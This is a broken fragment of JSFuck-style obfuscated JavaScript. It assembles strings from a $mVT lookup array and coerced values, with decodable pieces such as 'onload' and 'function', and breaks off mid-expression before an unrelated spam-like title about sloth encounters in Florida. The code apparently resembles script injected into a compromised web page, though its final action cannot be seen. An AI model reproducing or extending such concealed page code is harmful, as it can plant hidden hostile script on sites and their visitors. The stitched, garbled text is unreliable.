!+[]]+$mVT[41]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[35]+$mVT[46]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[46]+(![]+[])[!+[]+!+[]]+$mVT[16]+([]+[]+{})[!+[]+!+[]]+$mVT[46]+$mVT[25]+$mVT[+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[42]+$mVT[43]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[8]+$mVT[28]+$mVT[1]+$mVT[20]+$mVT[14]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[25]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[4]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[4]+([![]]+{})[+!+[]+[+[]]]+([]+[]+[][[]])[!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+$mVT[46]+$mVT[45]+$mVT[20]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+$mVT[19]+$mVT[+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[25]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[(+[])]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+$mVT[+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[2]+(!![]+[])[+!+[]]+$mVT[0]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([]+[]+{})[+!+[]]+(![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+$mVT[37]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+$mVT[22]+$mVT[3]+$mVT[7]+$mVT[36]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$mVT[37]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+$mVT[27]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$mVT[(+[])]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[40]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[36]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[2]+(!![]+[])[+!+[]]+$mVT[(+[])]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[42]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[25]+(!![]+[])[+[]]+$mVT[3]+$mVT[40]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[(+[])]+(![]+[])[!+[]+!+[]+!+[]]+(!!
Sloth Encounters In Florida, Articles K